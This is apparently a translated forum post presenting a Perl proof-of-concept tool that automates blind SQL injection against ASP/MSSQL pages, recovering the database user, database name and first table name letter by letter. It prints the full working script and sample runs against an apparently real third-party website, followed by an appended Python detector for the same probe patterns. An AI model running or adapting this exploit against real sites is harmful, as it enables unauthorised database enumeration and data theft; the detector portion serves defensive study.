A Perl implementation of cawan's "An approach to database penetration with SQL Injection"

Yesterday I read cawan's article "An approach to database penetration with SQL Injection" and thought it was really good, so I implemented the method it proposes in Perl. This program is only a POC version, so I only implemented guessing user, db_name and the first table name; the other functions are not implemented yet. I also did not optimise the guessing part of the program at all: it uses the easiest algorithm to code, which is also comparatively slow and inefficient, as anyone with a trained eye will notice.

If people think it is worthwhile, the program could be extended with functions such as guessing all table names and the columns of each table. Of course, if you intend to release it, don't use Perl~~~~

The program's usage help looks like this:

H:/temp>sin.pl
********************************************************************************

          SQL Injection New Method POC

            Method By cawan[EST]

            Coded By superlone[EST]

    Usage:
          sin.pl url


              -u   try to get user() return value
              -d   try to get db_name() return value
              -t   try to get first table name value
        EXAMPLE:
              sin.pl http://www.xxx.com/userinfo.asp?id=1 -t

    ********************************************************************************




Guessing user goes as follows:

    H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u

    [+]Testing if there is vul in your URL page...

    [+]SQL Injection Vulnerability found!

    [+]Guessing user() return value length...Wait!

    ********************************************************************************

    [+]user() return value length is [7]

    ********************************************************************************

    [+]Guessing user() return value...Wait!

    ********************************************************************************

    [+]the 1th letter is:t
    [+]the 2th letter is:h
    [+]the 3th letter is:o
    [+]the 4th letter is:m
    [+]the 5th letter is:a
    [+]the 6th letter is:s
    [+]the 7th letter is:a
    [+]user() return value is [thomasa]

    ********************************************************************************




Guessing the first table name goes as follows:

    H:/temp>sin.pl http://www.aquavelvas.com/blog.asp?id=4 -t

    [+]Testing if there is vul in your URL page...

    [+]SQL Injection Vulnerability found!

    [+]Guessing first table name length...Wait!

    ********************************************************************************

    [+]first table name length is [17]

    [+]Guessing first table name value...Wait!

    [+]the 1th letter is:g
    [+]the 2th letter is:e
    [+]the 3th letter is:o
    [+]the 4th letter is:i
    [+]the 5th letter is:p
    [+]the 6th letter is:c
    [+]the 7th letter is:o
    [+]the 8th letter is:u
    [+]the 9th letter is:n
    [+]the 10th letter is:t
    [+]the 11th letter is:r
    [+]the 12th letter is:y
    [+]the 13th letter is:w
    [+]the 14th letter is:h
    [+]the 15th letter is:o
    [+]the 16th letter is:i
    [+]the 17th letter is:s
    [+]first table name value is [geoipcountrywhois]

    ********************************************************************************

A very simple implementation, so please don't laugh at me... The whole code is as follows:
#!/usr/bin/perl
#method by cawan[EST]
#coded by superlone[EST]
#use strict;
use LWP::UserAgent;
use HTTP::Request;
# candidate characters tried at each position: letters first, then digits
local @alpha_code=('a'..'z');
local @number_code=(0..9);

if(@ARGV==0){
    &help;
}

my $url=shift;
my $ua=new LWP::UserAgent;

if($ARGV[0] eq "-u"){
    &testpage($url);
    print "[+]Guessing user() return value length...Wait!\n\n";
    print "*" x 80,"\n";
    my $ilen=&guesslength($url,"user");
    print "[+]user() return value length is [".$ilen."]\n\n";
    print "*" x 80,"\n";
    print "[+]Guessing user() return value...Wait!\n\n";
    print "*" x 80,"\n";
    print "[+]user() return value is ". &crackcode($url,$ilen,"user") ."\n\n";
    print "*" x 80,"\n";
} elsif($ARGV[0] eq "-d"){
    &testpage($url);
    print "[+]Guessing db_name() return value length...Wait!\n\n";
    print "*" x 80,"\n";
    my $ilen=&guesslength($url,"db_name");
    print "[+]db_name() return value length is [".$ilen."]\n\n";
    print "[+]Guessing db_name() return value...Wait!\n\n";
    print "*" x 80,"\n";
    print "[+]db_name() return value is ". &crackcode($url,$ilen,"db_name") ."\n\n";
    print "*" x 80,"\n";
} elsif($ARGV[0] eq "-t"){
    &testpage($url);
    print "[+]Guessing first table name length...Wait!\n\n";
    print "*" x 80,"\n";
    my $ilen=&guesslength($url,"table");
    print "[+]first table name length is [".$ilen."]\n\n";
    print "[+]Guessing first table name value...Wait!\n\n";
    print "[+]first table name value is ". &crackcode($url,$ilen,"table") ."\n\n";
    print "*" x 80,"\n";
} else {
    &help;
}

# length of the value: raise the threshold in len(...)>'i' one step at a
# time; the first threshold at which the page answers with an error page
# is reported as the length (at most 32 requests)
sub guesslength{
    my $url=shift;
    my $func=shift;

    $func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");
    my $i=0;
    while($i<32)
    {
        my $temp=$url."'%20and%20len(".$func.")>'".$i++;
        #print "[-]Structured URL:"."$temp"."\n";
        my $req=new HTTP::Request('GET'=>$temp);
        my $res=$ua->request($req);
        if($res->content=~/Syntax error/ ||$res->content=~/Either BOF or EOF is True/ ){
            last;
        }
    }
    return $i-1;
}

# check whether the page reacts to an injected condition at all; exits otherwise
sub testpage{
    my $url=shift;
    $url.=" and 1=1";
    my $ua=new LWP::UserAgent;
    my $req=new HTTP::Request('GET'=>$url);
    #print "URL is ".$url."\n";
    print "\n[+]Testing if there is vul in your URL page...\n\n";
    my $res=$ua->request($req);
    #print "return content:".$res->content."\n";
    if($res->content=~/Syntax error/){
        print "[+]SQL Injection Vulnerability found!\n\n";
    } else {
        print "[+]Page has no vul or server error echo disabled!\n\n";
        exit;
    }
}

sub help{
    print "*" x 80,"\n";
    print "\t\tSQL Injection New Method POC\n\n";
    print "\t\t   Method By cawan[EST]\n\n";
    print "\t\t  Coded  By superlone[EST]\n\n";
    print "\tUsage:\n\t\tsin.pl url\n\n";
    print "\t\t-u   try to get user() return value\n";
    print "\t\t-d   try to get db_name() return value\n";
    print "\t\t-t   try to get first table name value\n";
    print "\tEXAMPLE:\n\t\tsin.pl http://www.xxx.com/userinfo.asp?id=1 -t\n\n";
    print "*" x 80,"\n";
    exit;
}

# recover the value one position at a time: every candidate character is
# tried with substring(...,k,1)='c', and the first candidate whose probe
# answers with an error page is taken as the character at position k
sub crackcode{
    my $url=shift;
    my $userlen=shift;
    my $func=shift;
    my $i=0;
    my $j=0;
    my $k=1;
    my $bfound=0;
    my $name;

    $func="(select top 1 name from sysobjects where xtype='U')" if($func eq "table");

    while($k<=$userlen){
        $i=0;$j=0;$bfound=0;
        while($i<@alpha_code){
            my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$alpha_code[$i++];
            #print $temp,"\n";
            my $req=new HTTP::Request('GET'=>$temp);
            my $res=$ua->request($req);
            if($res->content=~/Incorrect syntax/){
                $name.=$alpha_code[$i-1];
                print "[+]the ".$k."th letter is:",$alpha_code[$i-1],"\n";
                $bfound=1;
                last;
            }
        }
        # digits are only tried when no letter matched at this position
        while($j<@number_code && $bfound==0){
            my $temp=$url."'%20and%20substring(".$func.",".$k.",1)='".$number_code[$j++];
            #print $temp,"\n";
            my $req=new HTTP::Request('GET'=>$temp);
            my $res=$ua->request($req);
            if($res->content=~/Incorrect syntax/){
                $name.=$number_code[$j-1];
                print "[+]the ".$k."th letter is:",$number_code[$j-1],"\n";
                $bfound=1;
                last;
            }
        }
        $k++;
    }
    return '['.$name.']';
}
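Seen from the server side, the script above leaves a very recognisable trail: one `and 1=1` check, a run of `len(...)>'N` length probes, then one `substring(...,K,1)='c` probe per candidate character, all from the same address and mostly answered with error pages. The following detector is an added example, not code from the post or from cawan or superlone: it parses constructed common-log-format lines (addresses, timestamps and statuses are invented for the example), tags each request with the probe shapes it contains, and reports addresses that sent a burst of them.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed common-log-format lines (not from the post); 10.0.0.9 sends the shapes sin.pl builds.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2006:10:00:01 +0000] "GET /blog.asp?id=4 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2006:10:00:02 +0000] "GET /blog.asp?id=4%20and%201=1 HTTP/1.1" 500 312
10.0.0.9 - - [01/Jan/2006:10:00:03 +0000] "GET /blog.asp?id=4'%20and%20len(user())>'0 HTTP/1.1" 500 312
10.0.0.9 - - [01/Jan/2006:10:00:04 +0000] "GET /blog.asp?id=4'%20and%20len(user())>'1 HTTP/1.1" 500 312
10.0.0.9 - - [01/Jan/2006:10:00:05 +0000] "GET /blog.asp?id=4'%20and%20substring(user(),1,1)='a HTTP/1.1" 500 312
10.0.0.9 - - [01/Jan/2006:10:00:06 +0000] "GET /blog.asp?id=4'%20and%20substring((select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'),1,1)='g HTTP/1.1" 500 312
10.0.0.7 - - [01/Jan/2006:10:00:07 +0000] "GET /blog.asp?id=5 HTTP/1.1" 200 4980
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Patterns are matched against the URL-decoded, lower-cased request path.
PROBE_PATTERNS = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*1\b"),
    "length_probe": re.compile(r"'\s*and\s+len\s*\(.*?\)\s*>\s*'\d+"),
    "char_probe": re.compile(r"'\s*and\s+substring\s*\(.*?,\s*\d+\s*,\s*1\s*\)\s*=\s*'"),
    "sysobjects_enum": re.compile(r"\bfrom\s+sysobjects\b"),
}

def parse_line(line):
    """(ip, decoded path, status) for a common-log-format line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, path, status = m.groups()
    return ip, unquote(path).lower(), int(status)

def classify(decoded_path):
    """Names of the probe patterns present in one decoded request path."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded_path)]

def scan_log(text):
    """Flagged requests as (ip, [pattern names], http status) tuples."""
    hits = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed and (tags := classify(parsed[1])):
            hits.append((parsed[0], tags, parsed[2]))
    return hits

def probing_sources(hits, threshold=3):
    """Addresses with >= threshold flagged requests: sin.pl needs tens of
    requests per recovered value, so a burst from one source is the signal."""
    counts = Counter(ip for ip, _tags, _status in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

The per-request tags alone are noisy on a busy site; the per-source count is what turns them into an alert, and the run of 500 responses from the same address is a second, independent signal worth correlating.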